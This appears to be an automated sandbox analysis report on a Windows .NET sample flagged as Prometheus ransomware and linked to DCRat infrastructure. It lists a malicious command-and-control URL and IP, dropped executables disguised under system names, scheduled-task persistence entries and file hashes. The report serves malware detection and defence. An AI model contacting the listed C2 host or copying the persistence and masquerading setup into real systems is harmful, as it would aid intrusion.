            C:\Program Files (x86)\Windows Portable Devices\winlogon.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files (x86)\Windows Portable Devices\winlogon.exe | 68% | Virustotal |
            C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exe | 68% | Virustotal |
            C:\Recovery\SearchApp.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Recovery\SearchApp.exe | 68% | Virustotal |
            C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe | 68% | Virustotal |
            C:\serversessionmonitor\blockfont.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.Prometheus
            C:\serversessionmonitor\blockfont.exe | 68% | Virustotal |
            No Antivirus matches
            Source | Detection | Scanner | Label
            a1023624.xsph.ru | 5% | Virustotal |
            Source | Detection | Scanner | Label
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
            http://a1023624.xsph.ru | 100% | Avira URL Cloud | malware
            http://a1023624.xsph.ru/ | 100% | Avira URL Cloud | malware
            http://a1023624.xsph.ru/1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs | 100% | Avira URL Cloud | malware
            https://index.from.sh/pages/game.html | 0% | Avira URL Cloud | safe
            https://cp.sprinthost.ru | 0% | Avira URL Cloud | safe
            http://a1023624.xsph.ru | 5% | Virustotal |
            https://cp.sprinthost.ru | 0% | Virustotal |
            http://a1023624.xsph.ru/ | 5% | Virustotal |
            https://cp.sprinthost.ru/auth/login | 0% | Virustotal |
            https://index.from.sh/pages/game.html | 0% | Virustotal |
            http://a1023624.xsph.ru/1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec8 | 100% | Avira URL Cloud | malware
            http://go.mic | 0% | Avira URL Cloud | safe
            https://cp.sprinthost.ru/auth/login | 0% | Avira URL Cloud | safe
            Name | IP | Active | Malicious | Reputation
            a1023624.xsph.ru | 141.8.194.149 | true | true | unknown
            Name: http://a1023624.xsph.ru/1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec836843e29b=14eed2ab8e75c30d5e3051e42b208839&97fa7d33edb300ced93fc3fe0e6b5970=gMxYzM1kzY5YmY1QWNzQTZhJjNjhTZ0QDZ2ITY3MTZjJWMmNWO5YmN&D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs
            Malicious: true
            Antivirus Detection:
            • Avira URL Cloud: malware
            Reputation: unknown
            Name: http://a1023624.xsph.ru
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000326B000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.0000000003292000.00000004.00000800.00020000.00000000.sdmp
            Malicious: true
            Antivirus Detection:
            • 5%, Virustotal
            • Avira URL Cloud: malware
            Reputation: unknown
            Name: http://a1023624.xsph.ru/
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.0000000003263000.00000004.00000800.00020000.00000000.sdmp
            Malicious: true
            Antivirus Detection:
            • 5%, Virustotal
            • Avira URL Cloud: malware
            Reputation: unknown
            Name: https://cp.sprinthost.ru
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmp
            Malicious: false
            Antivirus Detection:
            • 0%, Virustotal
            • Avira URL Cloud: safe
            Reputation: unknown
            Name: https://index.from.sh/pages/game.html
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmp
            Malicious: false
            Antivirus Detection:
            • 0%, Virustotal
            • Avira URL Cloud: safe
            Reputation: unknown
            Name: http://a1023624.xsph.ru/1ffc0666.php?D6sO3=coW9eQnQdwC&8Qdw2X=mrLKL&03ZD=Zcs&494c04091cad695e488cec8
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000326B000.00000004.00000800.00020000.00000000.sdmp
            Malicious: true
            Antivirus Detection:
            • Avira URL Cloud: malware
            Reputation: unknown
            Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: blockfont.exe, 00000004.00000002.1784999674.000000000365B000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000326B000.00000004.00000800.00020000.00000000.sdmp
            Malicious: false
            Antivirus Detection:
            • URL Reputation: safe
            Reputation: unknown
            Name: http://go.mic
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000014.00000002.1867548337.0000000001110000.00000004.00000020.00020000.00000000.sdmp
            Malicious: false
            Antivirus Detection:
            • Avira URL Cloud: safe
            Reputation: unknown
            Name: https://cp.sprinthost.ru/auth/login
            Source: qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.000000000329D000.00000004.00000800.00020000.00000000.sdmp, qwhJcOiWbbUoQMvwnJNr.exe, 00000025.00000002.1825230562.00000000032C8000.00000004.00000800.00020000.00000000.sdmp
            Malicious: false
            Antivirus Detection:
            • 0%, Virustotal
            • Avira URL Cloud: safe
            Reputation: unknown
            IP | Domain | Country | ASN | ASN Name | Malicious
            141.8.194.149 | a1023624.xsph.ru | Russian Federation | 35278 | SPRINTHOSTRU | true
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1502154
            Start date and time:2024-08-31 09:21:05 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 6m 49s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:42
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:5P9EdUgv5r.exe
            renamed because original name is a hash value
            Original Sample Name:1F70E167B93D471AF9DAF333145DB4CD.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@38/21@1/1
            EGA Information:
            • Successful, ratio: 20%
            HCA Information:
            • Successful, ratio: 72%
            • Number of executed functions: 360
            • Number of non-executed functions: 90
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): RuntimeBroker.exe, ShellExperienceHost.exe, winlogon.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe, SearchApp.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target blockfont.exe, PID 7076 because it is empty
            • Execution Graph export aborted for target qwhJcOiWbbUoQMvwnJNr.exe, PID 7508 because it is empty
            • Execution Graph export aborted for target qwhJcOiWbbUoQMvwnJNr.exe, PID 7552 because it is empty
            • Execution Graph export aborted for target qwhJcOiWbbUoQMvwnJNr.exe, PID 7900 because it is empty
            • Not all processes were analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            Time | Type | Description
            03:22:10 | API Interceptor | 4x Sleep call for process: qwhJcOiWbbUoQMvwnJNr.exe modified
            08:22:04 | Task Scheduler | Run new task: backgroundTaskHostb path: "C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe"
            08:22:05 | Task Scheduler | Run new task: qwhJcOiWbbUoQMvwnJNr path: "C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe"
            08:22:05 | Task Scheduler | Run new task: qwhJcOiWbbUoQMvwnJNrq path: "C:\Program Files (x86)\microsoft onedrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exe"
            08:22:05 | Task Scheduler | Run new task: winlogon path: "C:\Program Files (x86)\windows portable devices\winlogon.exe"
            08:22:05 | Task Scheduler | Run new task: winlogonw path: "C:\Program Files (x86)\windows portable devices\winlogon.exe"
            08:22:08 | Task Scheduler | Run new task: backgroundTaskHost path: "C:\Program Files (x86)\windows media player\en-US\backgroundTaskHost.exe"
            08:22:08 | Task Scheduler | Run new task: SearchApp path: "C:\Recovery\SearchApp.exe"
            08:22:08 | Task Scheduler | Run new task: SearchAppS path: "C:\Recovery\SearchApp.exe"
            Match | Associated Sample Name / URL | Detection | Threat Name
            141.8.194.149 | ONkN42VBrA.exe | malicious | DCRat
            141.8.194.149 | W1jPemW7dh.exe | malicious | DCRat
            141.8.194.149 | 5GOuTtZoQn.exe | malicious | LummaC, Poverty Stealer, SmokeLoader
            141.8.194.149 | SecuriteInfo.com.W32.Trojan.FWF.gen.Eldorado.15788.4670.exe | malicious | LummaC, Poverty Stealer, SmokeLoader
            141.8.194.149 | ZM7nD5Un8l.exe | malicious | DCRat
            141.8.194.149 | zMX3ObXlR6.exe | malicious | DCRat
            141.8.194.149 | jbLwhEMdSh.exe | malicious | DCRat
            141.8.194.149 | Ryf8vHLcLt.exe | malicious | DCRat
            141.8.194.149 | Linux_amd64 | malicious | Unknown
            No context
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            SPRINTHOSTRU | 06wRHV3NYY.exe | malicious | DCRat | 141.8.192.103
            SPRINTHOSTRU | bfderfg.exe | malicious | DCRat, PureLog Stealer, zgRAT | 141.8.197.42
            SPRINTHOSTRU | YMtjYvZX2i.exe | malicious | DCRat | 141.8.197.42
            SPRINTHOSTRU | p7oBHwDt23.exe | malicious | DCRat | 141.8.197.42
            SPRINTHOSTRU | pxkGBmsm1Y.exe | malicious | DCRat | 141.8.193.236
            SPRINTHOSTRU | N7lmWFMEgx.exe | malicious | DCRat | 141.8.192.126
            SPRINTHOSTRU | X1BQ0d74HR.exe | malicious | DCRat | 141.8.197.42
            SPRINTHOSTRU | KE4FVpmbfO.exe | malicious | DCRat | 141.8.192.151
            SPRINTHOSTRU | T3sSKdPRf4.exe | malicious | DCRat | 141.8.197.42
            SPRINTHOSTRU | rGTmuDibad.exe | malicious | DCRat | 141.8.192.126
                              No context
                              No context
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with very long lines (643), with no line terminators
                              Category:dropped
                              Size (bytes):643
                              Entropy (8bit):5.907337812318845
                              Encrypted:false
                              SSDEEP:12:6+d4etcQ6mMxSimjpltCJaj9I0kmZWIAAE0pQFki2AjM25nch/D4:f6gc+aa5PkmZU0pKWAjMMch/E
                              MD5:51F1CE390161EFAD98BE030A4B810C35
                              SHA1:97FB4306C7324A0C2943AFB3789319CB4FFFA242
                              SHA-256:31077E6ED57C9ACCA6E84A54E1D3D707E4C78B15D31F684D1C2B076086BF0848
                              SHA-512:C167FD430D8B62DE6D8B776983529EC12F6830062971420A60DF33C212E444502A313DA07C9151EF2BCF6A91C2FE3CA5C21D18317E185975E6A182FDAC273D18
                              Malicious:false
                              Preview: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
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with very long lines (542), with no line terminators
                              Category:dropped
                              Size (bytes):542
                              Entropy (8bit):5.874543997183341
                              Encrypted:false
                              SSDEEP:12:zrNAa4tVOGjo9HmJrOcGNkT6OCkSb8gBrs1h3QEFVEJvK+:6tkGaDo6OCkSb8ggJFV7+
                              MD5:473C13778837169DDA070969CBE1F6D0
                              SHA1:153B237BE4660E8BB28BA33B5A9BDE3C0EBF5F5E
                              SHA-256:6736B67F3A13CA6A0A2631CC44336FAB1455E119EECFD05D87EBD9E0753C3FD4
                              SHA-512:4998C032AAD7B6A76713663E88986B60F4C0CA59974A631EFA1A4417364ADB551D8839C992F50AB2234F4BBCFD73EF9016E90CEAA35D69B5445BCB4F473CF869
                              Malicious:false
                              Preview:
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):89
                              Entropy (8bit):5.3141145771995
                              Encrypted:false
                              SSDEEP:3:kdswHbzamLL3NZPq/0HPoADSEVt:kd9beWL3nI0HPR+EVt
                              MD5:2BD7284831CEA0C7DCD251A484CE43C1
                              SHA1:37BCC1ABE155D57293AA5ED8FEA05C5BE0638A3D
                              SHA-256:15E4FF66C4C5A32186F1D5A5EC90AFEAACE5CC94E1E3B36DC422A42734CE7C70
                              SHA-512:B979C9B4F32D6DEBFB93D161EC78CB08E1B14AC0090FB30F753622776D87D25282CD70678F8F34806139148182A5A84C3FA1C85DD3BBFA48841D5A34728318E6
                              Malicious:false
                              Preview:w2v40cUicM6iByg4YCtINpAK7fXXpu7pO1Jfu3oSSEVjShIk2k1R6a1H2k6UE62rOQTKpAJfYa0JUa1aXxfF3psy9
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with very long lines (606), with no line terminators
                              Category:dropped
                              Size (bytes):606
                              Entropy (8bit):5.876836736672927
                              Encrypted:false
                              SSDEEP:12:JRdQ2tsXqWgv0VCtC7CsiAypO30r5FwPf9gBqvPq0FK10LqOyN1u9:TdQIxWg5tCa8ktFw9XPM6LpSY9
                              MD5:76733DAB10E600F5A963603B6325A241
                              SHA1:CDADBC9F27C85F61C7A85F3126EC704F9625A062
                              SHA-256:792BFFE63AC29CDA756D5932CF8D0A42E9B00F3F8691F95DBC143D391D4825B4
                              SHA-512:1442B6F3EF687D0C7D371766D74C5EEDA7347540AB9D369259DE28EDFF808218A789BBFD2EB46DA78FB69841D942634C13AA214C8E8AD641E4944CBBF4A2EC3E
                              Malicious:false
                              Preview:
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with very long lines (471), with no line terminators
                              Category:dropped
                              Size (bytes):471
                              Entropy (8bit):5.858848168349901
                              Encrypted:false
                              SSDEEP:12:coEuzTLCeVo57dQAMv/CrYQv/OOVw6Vo1GWOqK8foh:coBzF6OpirYQnOO6Tgn9h
                              MD5:D2042EDE3DD2186A76FEBFE7B941D74B
                              SHA1:5D74AB421A4925A19F8973EE64A8869EC08CD7B5
                              SHA-256:0DFF5BF9EBE74F4FC30AC85A68616728C78C899F83A374B62B599A8CAD300AE6
                              SHA-512:E9D24F90FAB80E6F820AF36DC6AC25A6B952BB35F93ADEE8F6256736A5421C62F2394E2BF4E4AE85EAA11EEC36D8569275037AAB77E1C418C3C675DEB6A46CE2
                              Malicious:false
                              Preview:MdNIlwjtb7ItlAuaRkpZetolwO6GptcLQn9EcNL8hjCueV5VdTCHN48czmVX0cEre7d8Bp8DYq14q3HaSknVqU7VogP01yIFfVPh27TxV8tgDEv5f4EPysBJ9HTfaHLjhvYVokiUR09rlbSjvUV7u3RwTGhvoyXOwK8RqZR5Wu87sTiizutFwOzoelCiCxqccv5acB3VDakA5TDAh963ERbhVUwEXt2jDfe7YHGx0YCVoytKiBAD0wXLTXFHOy8ThA6ZyGmZ3ICqOG3gkmgVszsQITnBC8jCZsyo2TVbZkJstr6NdihmSmlrRpRfdkX5iAQgRPoRQE5IpAhbXZhdb7twHGWMC07yMOJsaa6O4PVNrcBRI0HED3dlReYK2bPZGG5b0yA7dSjLlfFoEFELt3vTuhb6BvWdA6GkhkaTzKkvUSAvYtGxXDqNVmqSWE5r6GKpYfHdouWjSA8chphSpiF
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with very long lines (465), with no line terminators
                              Category:dropped
                              Size (bytes):465
                              Entropy (8bit):5.8778726036893385
                              Encrypted:false
                              SSDEEP:12:GYgXtJq6KQPjZgTHbSEz7zYEg+j18by0kpmKnVU/3R+:GYgdJT5jZgTzMaj18qpnVio
                              MD5:D879C4EEBE16752FC794E4BC6C0FD0B1
                              SHA1:F3201A6B4288D6266420B55115A570BC5C7FA8C9
                              SHA-256:7060278F3584A23F4799055D7394EAE0D2F1252DAF388015B82EACF104873490
                              SHA-512:1AD763ACDF1ADD7370F4891AF3B4486507E7C0A5738358E82DFF39C10D67C342D241BD5CC59DD4A09080D7E96124B272D71B0D9731194F10407C213CE5A901ED
                              Malicious:false
                              Preview:9QX4JJGYgdBUlbUzlVQ9ToSrcg67ak3uLn5zUD1WPllElg9dEgf9hrIU8qcmNJ86kRI8fffid3usCNF6hd23F3Neek0nlOJGnpdTXB7jB7fn7aSvkfFtQE0qEnd4o16OuoFWtwigfT2HYjhESFDFJZziyxOuhC4JAR2TU5By7iO7MtSeGZmix1FVyhh6hy9cYsHHrOtWDPIkK2WFetoHaVVJMgexYFQIjvidmLx1pQeiteK6LbbyK1CCX75Ku68899AZT2dT6wcK1xZrWhm6nc8stfFoQnHsRgjtdvmS8I1XZ2LkhNyMUCUhBSqywzCTpt2UNqOl5T8fkkS0TfGCz4XPLCsKFyfIFisqA1W19MQBEz6aAzeRtAduVmIL7DfHyzZB1m0cJODmnWLWFRKPTOZFE8UXsK45rJMOZ5jX8BHe61G8avGp3PxjZU63Rdt9TI4eJ66KswRRG4JN1
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):101
                              Entropy (8bit):5.3632215073114855
                              Encrypted:false
                              SSDEEP:3:yqsu7diA0w01N6s2ZT1dSWGr4Oe2e1F:yqs0Z0HcTYT+
                              MD5:49720C956735A20B6A1F1DE803EA113C
                              SHA1:172C559A6CB30E0A0230887378E0CBFC523A3656
                              SHA-256:3AC9554CFF411DDD308379773444B06B8BBF496B1AF01469BAB78253B051BF8F
                              SHA-512:0361E472B15844A6D365A341F3083D662CF531D0D03208A20C1F0A5E16D06420C2BF44FCA861455130A9FC34560A7E9B4B1AD0676084B2E23080A0145006A4B4
                              Malicious:false
                              Preview:8pGfSILy6myez56G8fceKtB5gw4EFdIgH1LCqw98tUQPhcHIS5c0KU4PoK8fNGsddSW7u4aMgevzcvYEpvwKARWx65YgxeummxvOG
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):1260544
                              Entropy (8bit):6.962887835235466
                              Encrypted:false
                              SSDEEP:24576:LAowXwr9vGB7T1Hb9+9h33fH53fZtE+lYQ6lIx4:E2vGd1onZGCP6O
                              MD5:960DC58A366579A52C966ACC596733B6
                              SHA1:341031AD4B4CC3246E6A7FAB9C946472A1AF9522
                              SHA-256:D2CF3C340BF5779FDD541CBAA3CE2BFACD1E8F6340718CC3646EB496E118E675
                              SHA-512:94570C7734DE4690DB263C24AAC0EF2B9060201D36C9AAF99CEDCF8C2757B30C27DB8D0BBA06A7698353423A0AF9A8AB9403266263226F76918078B5EC54C1D2
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 88%
                              • Antivirus: Virustotal, Detection: 68%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......N ... ...@....@.. ....................................@.................................. ..K.................................................................................... ............... ..H............text...T.... ...................... ..`.sdata.../...@...0..................@....rsrc................6..............@..@.reloc...............:..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\serversessionmonitor\blockfont.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1830
                              Entropy (8bit):5.3661116947161815
                              Encrypted:false
                              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
                              MD5:FE86BB9E3E84E6086797C4D5A9C909F2
                              SHA1:14605A3EA146BAB4EE536375A445B0214CD40A97
                              SHA-256:214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
                              SHA-512:07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
                              Malicious:false
